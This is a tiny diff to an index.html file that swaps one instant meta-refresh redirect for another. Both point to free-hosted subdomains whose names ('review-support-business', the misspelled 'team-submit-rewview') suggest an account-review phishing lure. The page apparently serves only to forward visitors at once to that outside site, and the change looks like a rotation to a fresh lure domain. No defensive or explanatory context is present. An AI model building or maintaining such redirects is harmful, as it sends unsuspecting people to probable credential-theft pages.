--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<meta http-equiv="refresh" content="0; url=http://review-support-business.000.pe/?i=1" />
+<meta http-equiv="refresh" content="0; url=http://team-submit-rewview.000.pe/?i=1" />
